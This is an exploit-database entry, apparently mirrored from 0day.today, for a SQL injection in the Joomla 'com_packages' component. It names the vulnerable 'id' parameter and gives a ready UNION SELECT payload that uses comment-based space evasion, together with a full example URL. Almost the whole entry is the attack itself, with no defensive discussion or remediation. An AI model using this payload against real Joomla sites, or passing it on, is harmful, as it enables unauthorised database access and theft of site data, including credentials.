id: 12284
date: 05/18/2010
title: Joomla Component com_packages SQL Injection Vulnerability
author: n/a
cves: 

=========================================================
Joomla Component com_packages SQL Injection Vulnerability
=========================================================


[!]#####################################################################################################[!]
  
[+] Vulnerable File :
  
http://127.0.0.1/index.php?option=com_packages&func=detail&Itemid=86&id=[SQL]
  
[+] ExploiT         :
  
-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8--
  
[+] Example         :
  
http://127.0.0.1/index.php?option=com_packages&func=detail&Itemid=86&id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8--
 
  
[!]#####################################################################################################[!]



#  0day.today [2023-03-21]  #